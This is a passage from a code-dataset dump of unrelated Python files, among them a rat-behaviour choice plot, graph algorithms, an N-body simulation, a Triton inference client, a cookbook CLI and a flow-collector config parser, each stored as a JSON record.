ne in enumerate(outcome_msgs):\n trial_num_string,self.reward_seq,choice,outcome,reward_vol,center_hold,side_delay,faulty_chance,faulty_maxcount,faulty_time_limit = ne[-1].split(',')[1:]\n self.trial_num = int(trial_num_string)\n if choice == 'L':\n if self.last_choice == 'L':\n self.consecutive_adjustment += .2\n else:\n self.consecutive_adjustment = 0\n side = 7 + self.consecutive_adjustment\n elif choice == 'R':\n if self.last_choice == 'R':\n self.consecutive_adjustment += .2\n else:\n self.consecutive_adjustment = 0\n side = 6 - self.consecutive_adjustment\n else:\n side = 0\n self.last_choice = choice\n self.last_side = side\n\n if outcome == 'C': # was rewarded\n self.rewarded_trials += 1\n color = 0\n symbol = 2 #square\n elif outcome == 'W': # correct sequence, but rewared was withheld\n color = 4\n symbol = 2 #square\n elif outcome == 'N' or outcome == 'P': # was not rewarded\n color = 1\n symbol = 2 #square\n elif outcome == 'B': # background reward\n color = 2\n symbol = 2 #square\n elif outcome == 'A': # abandoned trial\n color = 1\n symbol = 3 #triangle\n elif outcome == 'F': # this \"rat percieved trial\" occured after a faulty nosepoke\n color = 3\n symbol = 0\n self.next_block_start +=1\n self.new_bout_line.setValue(self.next_block_start)\n self.bout_text.setPos(self.next_block_start, self.bout_info_ylocation)\n self.bout_text.setText(str(self.next_block_start - self.trial_num))\n \n self.data[-n_new+i,0] = self.trial_num\n self.data[-n_new+i,1] = side\n self.data[-n_new+i,2] = color\n self.data[-n_new+i,3] = symbol\n \n self.plot.setData(self.data[:,0],self.data[:,1],\n symbol=[self.my_symbols[int(ID)] for ID in self.data[:,3]],\n symbolSize=10,\n symbolPen=pg.mkPen(color=(150,150,150),width=1),\n symbolBrush=[self.my_colors[int(ID)] for ID in self.data[:,2]]\n )\n \n if self.faulty_drawn_in_center:\n self.faulty_drawn_in_center = False\n self.plot_widget.removeItem(self.faulty_line)\n self.faulty_line = pg.ErrorBarItem(x=np.array([self.trial_num - .5]),y=np.array([self.last_side]),height=.5,pen = pg.mkPen(color='#FF1F1F',width=3))\n self.plot_widget.addItem(self.faulty_line)\n\n\n self.update_title()\n if self.do_update:\n self.plot_widget.setRange(xRange=[self.trial_num-choice_plot_window,self.trial_num+choice_plot_look_ahead], padding=0)\n if faulty_msgs and not self.faulty_drawn_in_center:\n self.faulty_line = pg.ErrorBarItem(x=np.array([self.trial_num + .5]),y=np.array([6.5]),height=.5,pen = pg.mkPen(color='#FF1F1F',width=3))\n self.plot_widget.addItem(self.faulty_line)\n self.faulty_drawn_in_center = True\n if new_block_msgs:\n for nb_msg in new_block_msgs:\n # label old bout change\n transition_line = pg.InfiniteLine(angle=90,pen=pg.mkPen(color='#FF1FE6',style=Qt.DashLine))\n transition_line.setValue(self.next_block_start + .5)\n self.plot_widget.addItem(transition_line)\n self.label_new_bout = True\n\n\n content = nb_msg[2].split(',')\n # add new bout change\n self.next_block_start = int(content[2]) + self.trial_num\n self.next_seq = content[3]\n self.new_bout_line.setValue(self.next_block_start + .5)\n self.bout_text.setPos(self.next_block_start + .5, self.bout_info_ylocation)\n\n # update title\n self.reward_seq = content[1]\n self.update_title()\n \n if newBlock_var_update_msgs:\n for block_start_update in newBlock_var_update_msgs:\n content = block_start_update[2].split(' ')\n self.next_block_start = int(content[1]) + self.trial_num\n self.new_bout_line.setValue(self.next_block_start)\n self.bout_text.setPos(self.next_block_start, self.bout_info_ylocation)\n self.bout_text.setText(str(self.next_block_start - self.trial_num))\n if newBlock_var_update_msgs:\n self.update_title()\n\n def toggle_update(self):\n self.do_update = not self.do_update\n if self.do_update:\n self.plot_widget.setRange(xRange=[self.trial_num-choice_plot_window,self.trial_num+choice_plot_look_ahead], padding=0)\n\n def update_title(self):\n if self.trial_num:\n reward_percentage = round(self.rewarded_trials/self.trial_num*100,2)\n else:\n reward_percentage = 0\n self.plot_widget.setTitle('{} Rat Perceived Choices made --- {:.1f}% Perceived Trials Rewarded --- Current Reward Sequence:{}'.format(\n self.trial_num,reward_percentage,self.create_color_string(self.reward_seq)))\n self.bout_text.setHtml('{} in {} real trials'.format(self.create_color_string(self.next_seq),str(self.next_block_start - self.trial_num)))\n if self.label_new_bout:\n self.label_new_bout = False\n current_seq_text = pg.TextItem(html = self.create_color_string(self.reward_seq), anchor=(0, .5))\n current_seq_text.setPos(self.trial_num +.5, self.bout_info_ylocation)\n self.plot_widget.addItem(current_seq_text)\n\n if self.trial_num != 0: #don't do this for start of session\n previous_bout_length_text = pg.TextItem(str(self.trial_num - self.bout_start_trial), anchor=(1, .5))\n previous_bout_length_text.setPos(self.trial_num +.5, self.bout_info_ylocation)\n self.plot_widget.addItem(previous_bout_length_text)\n self.bout_start_trial = self.trial_num\n\n def update_block_marker(self,xpos):\n pass\n\n def create_color_string(self,sequence_string):\n blue,orange = '#00DEFF','#FF9A00'\n output_string = ''\n for letter in sequence_string:\n if letter == 'L':\n color = orange\n else:\n color = blue\n output_string += '{}'.format(color,letter)\n return output_string\n","sub_path":"gui/sequence_gui/choice_plot.py","file_name":"choice_plot.py","file_ext":"py","file_size_in_byte":10505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"464358846","text":"import taco_vis as tv\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\n\n########################\n# Create example dataset:\ndef flow_func(radius, theta, time):\n u = np.sin(2 * np.pi * radius) * np.sin(theta) * np.sin(2 * np.pi * time)\n return u\n\n\ntime = np.linspace(0, 1, 50)\nradius = np.linspace(0, 1, 10)\ntheta = np.linspace(0, 2 * np.pi, 50)\n\nTH, R, T = np.meshgrid(theta, radius, time)\ndata = flow_func(R, TH, T)\n\n# Read data into flow class\nf = tv.FLOW(data)\n\nassert np.min(f.data) < 0, 'Data has no negative values'\nassert np.max(f.data) > 0, 'Data has no positive values'\n\n\n# Test animate contour plot_contours\nf.colorbar_title = \"Non-dimensional\\nvelocity\"\nf.movie_filename = \"test_contour.mp4\"\nf.plot_contours(animate=True, save=True)\n# If plotting another image, close this animation figure first.\nplt.close(\"all\")\nassert os.path.isfile(f.movie_filename), 'File {} does not exist after saving'.format(f.movie_filename)\n\n\n# Test contour plot_contours\nf.colorbar_title = \"Non-dimensional\\nvelocity\"\nf.image_filename = \"test_contour.png\"\nf.plot_contours(save=True, time_idx=14)\n# If plotting another image, close this animation figure first.\nplt.close(\"all\")\nassert os.path.isfile(f.image_filename), 'File {} does not exist after saving'.format(f.movie_filename)\n\n\n#Create axisymmetric data\ndata_axisym = flow_func(R, np.pi/2, T)\n\nf_axisym = tv.FLOW(data_axisym)\n\nf_axisym.image_filename = \"test_cylinders.png\"\nf_axisym.colorbar_title = \"Non-dimensional\\nvelocity\"\nf_axisym.plot_cylinders(save=True, time_idx=14)\n# If plotting another image, close this animation figure first.\nplt.close(\"all\")\nassert os.path.isfile(f_axisym.image_filename), 'File {} does not exist after saving'.format(f_axisym.movie_filename)\n\n\nf_axisym.image_filename = \"test_cylinders_3D.png\"\nf_axisym.plot_cylinders_3D(save=True, time_idx=14)\n# If plotting another image, close this animation figure first.\nplt.close(\"all\")\nassert os.path.isfile(f_axisym.image_filename), 'File {} does not exist after saving'.format(f_axisym.movie_filename)\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"530846742","text":"def jump(A):\n if len(A) <= 1:\n return 0\n jumps = [-1]*(len(A)-1)\n jumps.append(0)\n lastPosition = len(A)-1\n for i in range(len(A)-2, -1, -1):\n if A[i] + i >= lastPosition:\n jumps[i] = min([1+jumps[j] for j in range(i+1, A[i]+i+1) if jumps[j] >= 0])\n lastPosition = i\n return jumps[0]\n\nprint(jump([1,2]))\n","sub_path":"week18/Jing/test_jump_2.py","file_name":"test_jump_2.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"479879602","text":"#!/usr/bin/env python\n# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of NVIDIA CORPORATION nor the names of its\n# contributors may be used to endorse or promote products derived\n# from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS ``AS IS'' AND ANY\n# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\n# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY\n# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nimport argparse\nimport numpy as np\nimport sys\nimport random\n\nimport tritongrpcclient\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-v',\n '--verbose',\n action=\"store_true\",\n required=False,\n default=False,\n help='Enable verbose output')\n parser.add_argument('-m',\n '--model_name',\n type=str,\n required=True,\n help='Model name')\n parser.add_argument('-u',\n '--url',\n type=str,\n required=False,\n default='localhost:8001',\n help='Inference server URL. Default is localhost:8001.')\n\n FLAGS = parser.parse_args()\n try:\n triton_client = tritongrpcclient.InferenceServerClient(url=FLAGS.url,\n verbose=FLAGS.verbose)\n except Exception as e:\n print(\"channel creation failed: \" + str(e))\n sys.exit()\n\n model_name = FLAGS.model_name \n\n mconf = triton_client.get_model_config(model_name, as_json=True)\n print('config:\\n', mconf)\n \n for i in range(50):\n # Infer\n inputs = []\n outputs = []\n \n nnodes = random.randint(100, 4000)\n nedges = random.randint(8000, 15000)\n\n inputs.append(tritongrpcclient.InferInput('x__0', [nnodes, 1433], 'FP32'))\n inputs.append(tritongrpcclient.InferInput('edgeindex__1', [2, nedges], \"INT64\"))\n\n x = np.random.normal(-10, 4, (nnodes, 1433)).astype(np.float32)\n x[x < 0] = 0.\n x[x > 1] = 1.\n edge_index = np.random.randint(0, nnodes, (2, nedges), dtype=np.int64)\n \n print(x.shape)\n print(edge_index.shape)\n\n # prepare inputs\n inputs[0].set_data_from_numpy(x)\n inputs[1].set_data_from_numpy(edge_index)\n\n # prepare outputs\n outputs.append(tritongrpcclient.InferRequestedOutput('logits__0'))\n\n # get the output\n results = triton_client.infer(model_name=model_name,\n inputs=inputs,\n outputs=outputs)\n output0_data = results.as_numpy('logits__0')\n print(output0_data)\n\n statistics = triton_client.get_inference_statistics(model_name=model_name)\n print(statistics)\n if len(statistics.model_stats) != 1:\n print(\"FAILED: Inference Statistics\")\n sys.exit(1)\n\n print('PASS: infer')\n","sub_path":"client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"116246617","text":"import os\nimport sys\nimport random\n\nfrom not_directed_graph import NotDirectedGraph\nfrom graph_builder import buildGraphFromFile\nfrom breath_first_search import breadthFirstSearch\nfrom eulerian_cycle import getEulerianTour\nfrom dijkstra import dijkstra\nfrom floyd_warshall import floydWarshall\nfrom topological_sorting import topologialSort\nfrom minimum_spanning_tree import minimumSpanningTree\n\n# on the first call to this function you must be SURE that \"path\" exists in the actual os.listdir()\nfrom strongly_connected_components import stronglyConnectedComponentes\n\n\ndef buildEachInstance(path: str) -> 'dict of Graphs':\n\tgraphs = dict()\n\n\t# go into folder\n\tos.chdir(path)\n\n\tfor item in os.listdir():\n\t\tif os.path.isdir(item):\n\t\t\tgraphs.update(buildEachInstance(item))\n\t\telse: \n\t\t\tgraphs[item] = buildGraphFromFile(item)\n\n\t# return to the initial folder\n\tos.chdir(\"..\")\n\n\treturn graphs\n\n# run all implemented algorithms on some graph\ndef test_graph(path: str, graph: NotDirectedGraph) -> None:\n\tprint('\\nTest Results for Graph in ' + path + ':\\n')\n\n\trand_vertex_id = random.choice(list(graph.vertices.keys()))\n\trand_vertex_name = graph.getVertexLabel(rand_vertex_id)\n\trand_vertex_neighbors = graph.getVertexNeighbors(rand_vertex_id)\n\trand_vertex_rand_neighbor = random.choice(list(rand_vertex_neighbors))\n\tother_rand_vertex_id0 = random.choice(list(graph.vertices.keys()))\n\tother_rand_vertex_id1 = random.choice(list(graph.vertices.keys()))\n\n\tprint('Number of vertices = ' + str(graph.getNumberOfVertices()))\n\tprint('Number of edges = ' + str(graph.getNumberOfEdges()))\n\tprint('Vertex ' + rand_vertex_id + ' degree = ' + str(graph.getVertexDegree(rand_vertex_id)))\n\tprint('Vertex ' + rand_vertex_id + ' name = ' + rand_vertex_name)\n\tprint('Vertex ' + rand_vertex_id + ' neighbors = ' + str(rand_vertex_neighbors))\n\tprint('Vertex ' + rand_vertex_id + ' has edge with ' + rand_vertex_rand_neighbor + ' = ' + str(graph.hasEdge(rand_vertex_id, rand_vertex_rand_neighbor)))\n\tprint('Vertex ' + rand_vertex_id + ' has edge with ' + other_rand_vertex_id0 + ' = ' + str(graph.hasEdge(rand_vertex_id, other_rand_vertex_id0)))\n\tprint('Vertex ' + rand_vertex_id + ' has edge with ' + other_rand_vertex_id1 + ' = ' + str(graph.hasEdge(rand_vertex_id, other_rand_vertex_id1)))\n\tprint('Edge ' + rand_vertex_id + ' <-> ' + rand_vertex_rand_neighbor + ' weight(s) = ' + str(graph.weight(rand_vertex_id, rand_vertex_rand_neighbor)))\n\ndef main():\n\tmaybePath = sys.argv[len(sys.argv)-1]\n\n\tif maybePath == \"testAll\":\n\t\tgraphs = buildEachInstance(\"instances\")\n\n\t\tfor graph in graphs:\n\t\t\tif len(graphs[graph].vertices) == 0:\n\t\t\t\tprint(\"Graph in \" + graph + ' has a problem')\n\t\t\t\treturn\n\n\t\tprint(\"Nothing wrong with the inputs.\\n\")\n\telse:\n\t\t# atividade1()\n\t\tatividade2()\n\ndef atividade1():\n\t# Exercicio 1:\n\tprint('Exercicio 1 (Funções De Grafos):')\n\tgraph_path = \"./instances/caminho_minimo/fln_pequena.net\"\n\tgraph = buildGraphFromFile(graph_path)\n\ttest_graph(graph_path, graph)\n\n\t# Exercicio 2:\n\tprint('\\nExercicio 2 (Busca em largura):\\n')\n\tprint(breadthFirstSearch(graph, '1')[0])\n\n\t# Exercicio 3:\n\tprint('\\nExercicio 3 (Ciclo Euleriano):\\n')\n\tgraph_path = \"./instances/ciclo_euleriano/ContemCicloEuleriano.net\"\n\tgraph = buildGraphFromFile(graph_path)\n\tprint(getEulerianTour(graph))\n\n\t# Exercicio 4:\n\tprint('\\nExercicio 4 (Dijkstra):\\n')\n\tgraph_path = \"./instances/caminho_minimo/fln_pequena.net\"\n\tgraph = buildGraphFromFile(graph_path)\n\tprint(dijkstra(graph, '1', True))\n\n\t# Exercicio 5:\n\tprint('\\nExercicio 5 (Floyd-Warshall):\\n')\n\tgraph_path = \"./instances/caminho_minimo/fln_pequena.net\"\n\tgraph = buildGraphFromFile(graph_path)\n\tprint(floydWarshall(graph))\n\ndef atividade2():\n\t# Exercicio 1:\n\tprint('Exercicio 1 (Componentes Fortemente Conexas)')\n\tgraph_path = \"./instances/dirigidos/dirigido2.net\"\n\tgraph = buildGraphFromFile(graph_path, is_directed=True)\n\tprint(stronglyConnectedComponentes(graph))\n\n\t# Exercicio 2:\n\tprint('Exercicio 2 (Ordenação Topológica)')\n\tgraph_path = \"./instances/dirigidos/manha.net\"\n\tgraph = buildGraphFromFile(graph_path, is_directed=True)\n\tprint(topologialSort(graph))\n\n\t# Exercicio 2:\n\tprint('Exercicio 3 (Arvore geradora minima - Prim)')\n\tgraph_path = \"./instances/arvore_geradora_minima/agm_tiny.net\"\n\tgraph = buildGraphFromFile(graph_path, is_directed=True)\n\tprint(minimumSpanningTree(graph))\n\nif __name__ == \"__main__\":\n\tmain()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"472219612","text":"import itertools\n\nimport numpy as np\n\nimport nbody.io\nimport nbody.mass\nfrom nbody import scale\n\n\nclass NBody:\n def __init__(self, data, n_bodies, virial_radius, total_mass, time=0.0):\n self._data = data\n self._n_bodies = n_bodies\n self._virial_radius = virial_radius\n self._total_mass = total_mass\n self._time = time\n\n def init_energy(self):\n # set scaling stuff\n T = self.kinetic_energy()\n V = self.potential_energy()\n \n for b in self._data:\n b.vel *= np.sqrt(abs(V) / T / 2)\n for b in self._data:\n beta = 0.5 * V / -0.25\n #b.pos *= 0.82*beta # scaling added to equalise energies\n b.pos *= beta # scaling added to equalise energies\n b.vel /= np.sqrt(beta)\n\n\n @property\n def data(self):\n return self._data\n @property\n def n_bodies(self):\n return self._n_bodies\n @property\n def virial_radius(self):\n return self._virial_radius\n @property\n def total_mass(self):\n return self._total_mass\n\n @property\n def time(self):\n return self._time\n\n def scale_distance(self, distance):\n return distance * self.virial_radius\n\n def scale_energy(self, energy):\n return energy * self.scale_mass(1) * self.scale_velocity(1)**2\n\n def scale_mass(self, mass):\n return mass * self.total_mass\n\n def scale_time(self, time):\n return time * 14.94 * np.sqrt(self.virial_radius**3 / self.n_bodies \n / self.total_mass)\n \n def scale_velocity(self, velocity):\n return velocity * 6.557e-2 * np.sqrt(self.n_bodies * self.total_mass \n / self.virial_radius)\n \n\n def crossing_time(self):\n return nbody.time.crossing()\n\n def half_mass_relaxation_time(self):\n n = len(self._data)\n hmr = self.half_mass_radius()\n return nbody.time.half_mass_relaxation(n, hmr)\n\n def core_collapse_time(self):\n hmr = self.half_mass_radius()\n return nbody.time.core_collapse(len(self._data), hmr)\n def core_radius(self):\n if not hasattr(self, \"_cached_core_radius\"):\n core_radius = 0\n\n densities = self._get_densities()\n density_center = self.density_center()\n \n for i, star in enumerate(self._data):\n central_distance = star.pos - density_center\n core_radius += densities[i] * np.linalg.norm(central_distance)\n core_radius /= np.sum(densities)\n\n self._cached_core_radius = core_radius\n return self._cached_core_radius\n\n def density_center(self):\n ds = self._get_densities()\n\n dc = np.zeros(3)\n for i, b in enumerate(self._data):\n dc += ds[i] * b.pos\n\n return dc / np.sum(ds)\n\n def mass_radius(self, factor):\n half_mass_radius = 0\n\n distances = []\n density_center = self.density_center()\n for star in self._data:\n distance = np.linalg.norm(star.pos-density_center)\n distances.append((star.mass, distance))\n sorted_distances = sorted(distances, key=lambda x: x[1])\n\n total_mass = np.sum([star.mass for star in self._data])\n contained_mass = 0\n iterator = iter(sorted_distances)\n while contained_mass < total_mass * factor:\n mass, distance = next(iterator)\n contained_mass += mass\n half_mass_radius = distance\n\n return half_mass_radius\n\n def half_mass_radius(self):\n return self.mass_radius(0.5)\n\n def kinetic_energy(self):\n e = 0.0\n for b in self._data:\n e += 1/2 * b.mass * np.linalg.norm(b.vel)**2\n return e\n\n def potential_energy(self, soft=True):\n e = 0.0\n for b1, b2 in itertools.combinations(self._data, 2):\n r = np.linalg.norm(b1.pos - b2.pos)\n e -= b1.mass * b2.mass / r\n return e\n\n def total_energy(self):\n return self.kinetic_energy() + self.potential_energy()\n\n\n @classmethod\n def from_file(cls, filename):\n data = nbody.io.read(filename)\n return cls(*data)\n\n @classmethod\n def from_plummer(cls, n_bodies, total_mass, virial_radius, mass_fn=nbody.mass.ktg):\n ms = mass_fn(n_bodies)\n rs, vs = nbody.dist.plummer(n_bodies)\n\n data = []\n for m, r, v in zip(ms, rs, vs):\n b = nbody.its.Body(m, r, v)\n data.append(b)\n nbody.its.init(data)\n\n return cls(data, n_bodies, virial_radius, total_mass)\n\n @classmethod\n def from_uniform(cls, n_bodies, total_mass, virial_radius, mass_fn=nbody.mass.ktg):\n ms = mass_fn(n_bodies)\n rs, vs = nbody.dist.uniform(n_bodies)\n\n data = []\n for m, r, v in zip(ms, rs, vs):\n b = nbody.its.Body(m, r, v)\n data.append(b)\n nbody.its.init(data)\n\n return cls(data, n_bodies, virial_radius, total_mass)\n\n def _get_densities(self):\n densities = np.empty( len(self._data) )\n\n ds = self._get_distances()\n sorted_distances = np.sort(ds, axis=1)\n\n for i, b in enumerate(self._data):\n density = 3 / (4 * np.pi)\n density *= 3.5 * b.mass\n density /= sorted_distances[i, 2]\n\n densities[i] = density\n return densities\n\n def _get_distances(self):\n distances = np.empty((len(self._data), len(self._data)))\n\n iterator = itertools.combinations(enumerate(self._data), 2)\n for (i, star1), (j, star2) in iterator:\n distance = np.linalg.norm(star1.pos - star2.pos)\n\n distances[i, j] = distance\n distances[j, i] = distance\n return distances\n","sub_path":"nbody/nbody.py","file_name":"nbody.py","file_ext":"py","file_size_in_byte":5727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"458124395","text":"from sys import argv\nimport sys\n\nsand_ingd = list(('ham', 'cheese', 'tomatoes'))\ncake_ingd = list(('flour', 'sugar', 'eggs'))\nsalad_ingd = list(('avocado', 'arugula', 'tomatoes', 'spinach'))\ns_dict = dict(ingredients=sand_ingd, meal='lunch', prep_time=10)\nc_dict = dict(ingredients=cake_ingd, meal='desert', prep_time=60)\ns_dict = dict(ingredients=salad_ingd, meal='lunch', prep_time=15)\ncookbook = dict(sandwich=s_dict, cake=c_dict, salad=s_dict)\n\n\ndef print_recipe(recipe_name):\n recipe_data = cookbook.get(recipe_name)\n print(f\"\"\"\\nRecipe for {recipe_name}:\nIngredients list: {recipe_data.get('ingredients')}\nTo be eaten for {recipe_data.get('meal')}\nTakes {recipe_data.get('prep_time')} of cooking.\"\"\")\n\n\ndef delete_recipe(recipe_name):\n del cookbook[recipe_name]\n\n\ndef add_recipe():\n print('Let\\'s add a new recipe!')\n print('Enter a name')\n new_name = str(input())\n print('Enter the ingredients (separate each one by a space)')\n raw_ing = str(input())\n new_ing = raw_ing.split(' ')\n print('Enter the meal type')\n new_meal = str(input())\n print('Enter the number of minutes needed (ex: 15)')\n new_time = str(input())\n new_rec = dict(ingredients=new_ing, meal=new_meal, prep_time=new_time)\n final_rec = {f\"{new_name}\": new_rec}\n print(final_rec)\n cookbook[f\"{new_name}\"] = new_rec\n print(f'{new_name} has successfuly been added to your cookbook!')\n\n\ndef print_all_recipes():\n output = \"\\nHere are all the recipes of your cookbook: \"\n len_book = len(cookbook)\n i = 0\n for n in cookbook:\n if i < len_book-1:\n cond = True\n else:\n cond = False\n liaison = ('.', ',')[cond]\n output += str(n) + liaison\n i += 1\n print(output)\n\n\nusage = \"\"\"Please select an option by typing one of the following numbers:\n1. Print a recipe\n2. Delete a recipe\n3. Add a recipe\n4. Print all recipes\n5. Quit\n \"\"\"\nprint(usage)\nwhile True:\n try:\n response = int(input())\n if response == 5:\n print('Cookbook closed.')\n sys.exit()\n if response == 4:\n print_all_recipes()\n continue\n if response == 3:\n add_recipe()\n continue\n if response == 1:\n print_all_recipes()\n print('Please chose one by writting it\\'s name')\n resp = input()\n # check if recipe exists in dict\n if cookbook.get(resp) is None:\n print('Sorry, this recipe is not in this cookbook.')\n print_all_recipes()\n continue\n else:\n print_recipe(resp)\n continue\n if response == 2:\n print_all_recipes()\n print(\"\"\"\n Please choose the one you wish to delete by writting it\\'s name\"\"\")\n resp = input()\n # check if recipe exixts in dict\n if cookbook.get(resp) is None:\n print('Sorry, this recipe is not in this cookbook.')\n print_all_recipes()\n continue\n else:\n del cookbook[resp]\n print(f'{resp} has been deleted.')\n continue\n else:\n print('This option does not exist.')\n print(usage)\n continue\n except SystemExit:\n sys.exit()\n except ValueError:\n print('This option does not exist.')\n print(usage)\n","sub_path":"ex06/recipe.py","file_name":"recipe.py","file_ext":"py","file_size_in_byte":3436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"501629437","text":"import sys\nfrom pprint import pprint\nimport numpy as np\nimport re\nimport csv\nimport time\n\nclass Layers:\n def __init__(self):\n self.layertypes = []\n self.weights = []\n self.biases = []\n self.numlayer = 0\n self.ffn_counter = 0\n\ndef parse_bias(text):\n if len(text) < 1 or text[0] != '[':\n raise Exception(\"expected '['\")\n if text[-1] != ']':\n raise Exception(\"expected ']'\")\n v = np.array([*map(lambda x: np.double(x.strip()), text[1:-1].split(','))])\n #return v.reshape((v.size,1))\n return v\n\ndef parse_vector(text):\n if len(text) < 1 or text[0] != '[':\n raise Exception(\"expected '['\")\n if text[-1] != ']':\n raise Exception(\"expected ']'\")\n v = np.array([*map(lambda x: np.double(x.strip()), text[1:-1].split(','))])\n return v.reshape((v.size,1))\n #return v\n\ndef balanced_split(text):\n i = 0\n bal = 0\n start = 0\n result = []\n while i < len(text):\n if text[i] == '[':\n bal += 1\n elif text[i] == ']':\n bal -= 1\n elif text[i] == ',' and bal == 0:\n result.append(text[start:i])\n start = i+1\n i += 1\n if start < i:\n result.append(text[start:i])\n return result\n\ndef parse_matrix(text):\n i = 0\n if len(text) < 1 or text[0] != '[':\n raise Exception(\"expected '['\")\n if text[-1] != ']':\n raise Exception(\"expected ']'\")\n return np.array([*map(lambda x: parse_vector(x.strip()).flatten(), balanced_split(text[1:-1]))])\n\ndef parse_net(text):\n lines = [*filter(lambda x: len(x) != 0, text.split('\\n'))]\n i = 0\n res = Layers()\n while i < len(lines):\n if lines[i] in ['ReLU', 'Affine']:\n W = parse_matrix(lines[i+1])\n b = parse_bias(lines[i+2])\n res.layertypes.append(lines[i])\n res.weights.append(W)\n res.biases.append(b)\n res.numlayer+= 1\n i += 3\n else:\n raise Exception('parse error: '+lines[i])\n return res\n \ndef parse_spec(text):\n text = text.replace(\"[\", \"\")\n text = text.replace(\"]\", \"\")\n with open('dummy', 'w') as my_file:\n my_file.write(text)\n data = np.genfromtxt('dummy', delimiter=',',dtype=np.double)\n low = np.copy(data[:,0])\n high = np.copy(data[:,1])\n return low,high\n\ndef get_perturbed_image(x, epsilon):\n image = x[1:len(x)]\n num_pixels = len(image)\n LB_N0 = image - epsilon\n UB_N0 = image + epsilon\n \n for i in range(num_pixels):\n if(LB_N0[i] < 0):\n LB_N0[i] = 0\n if(UB_N0[i] > 1):\n UB_N0[i] = 1\n return LB_N0, UB_N0\n","sub_path":"src/helper_functions.py","file_name":"helper_functions.py","file_ext":"py","file_size_in_byte":2649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"585047210","text":"#!/usr/bin/env python\n\nimport os\nimport argparse\nimport ConfigParser\n\nconfigfile = None\nlogfile = None\nis_daemon = False\nbe_verbose = False\n\ndef parse_args() :\n \n global configfile, logfile, is_daemon, be_verbose\n ap = argparse.ArgumentParser(description=\"Collector and correlator of Netflow v5, v9 and IPFIX flows and Syslog messages\")\n ap.add_argument('-c', metavar='configfile', default='/usr/local/etc/collectord.conf', help=\"collectors' config file\")\n ap.add_argument('-l', metavar='logfile', default='/var/log/collectord.log', help='log file for collector own messages')\n ap.add_argument('-d', action='store_true', help='start as daemon')\n ap.add_argument('-v', action='store_true', help='verbose debug messages')\n args = ap.parse_args()\n\n configfile = args.c\n logfile = args.l\n is_daemon = args.d\n be_verbose = args.v\n return args\n\ndef parse_config(filename) :\n if not os.path.isfile(filename):\n print(\"File {0} not found\".format(filename))\n quit()\n\n cf = ConfigParser.SafeConfigParser()\n cf.read(filename)\n res = {}\n res['sections'] = cf.sections()\n for sect in res['sections'] :\n opts = {}\n for opt in ['address', 'port', 'type'] :\n opts[opt] = cf.get(sect, opt)\n res[sect] = opts\n return res\n\ndef print_args_config(config) :\n\n print(\"Running the following config:\")\n print(\" logfile name: {0}\".format(logfile))\n print(\" config file name: {0}\".format(configfile))\n print(\" is daemon: {0}\".format(is_daemon))\n print(\" be verbose: {0}\".format(be_verbose))\n print('Config file is:')\n for s in config['sections']:\n print(\"Section {0}:\".format(s))\n print(\" Collector type: {0}\".format(config[s]['type']))\n print(\" Listening on : {0}:{1}\".format(config[s]['address'], config[s]['port']))\n\nif __name__ == \"__main__\":\n parse_args()\n c = parse_config(configfile)\n if c == None :\n print('Error parsing config file')\n else :\n print_args_config(c)\n \n","sub_path":"collector_config.py","file_name":"collector_config.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"513694211","text":"# %load q04_plot_runs_by_balls/build.py\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nipl_df = pd.read_csv('data/ipl_dataset.csv', index_col=None)\n\n\n# Solution\ndef plot_runs_by_balls():\n runs = ipl_df.groupby(['match_code','batsman'])['runs'].sum()\n balls = ipl_df.groupby(['match_code','batsman'])['delivery'].count()\n plt.scatter(runs,balls)\n plt.show()\nplot_runs_by_balls() \n\n\n","sub_path":"q04_plot_runs_by_balls/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"374170183","text":"import soundfile as sf\nimport torch\nimport numpy as np\nfrom 